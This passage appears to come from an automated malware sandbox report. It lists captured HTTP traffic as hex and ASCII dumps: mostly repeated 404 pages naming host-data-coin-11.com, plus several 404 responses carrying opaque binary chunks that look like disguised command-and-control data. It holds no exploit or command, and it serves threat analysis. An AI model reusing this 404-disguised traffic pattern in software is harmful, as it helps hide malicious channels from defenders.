61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 1e 49 3a 44 a6 e8 de ea e4 40 fd 45 91 6e b8 57 5b 91 17 bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:D@EnW[10
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 af 8d 70 bc 57 dd 40 d6 f6 2e 84 2a e8 c3 90 53 2e ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9HpW@.*S.c0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 80 49 08 25 01 e5 e9 8d b0 a2 37 0d 0a 30 0d 0a 0d 0a Data Ascii: 1fI:82OI%70
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 67 5d a4 09 d7 cd 66 c7 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevg]fdP0
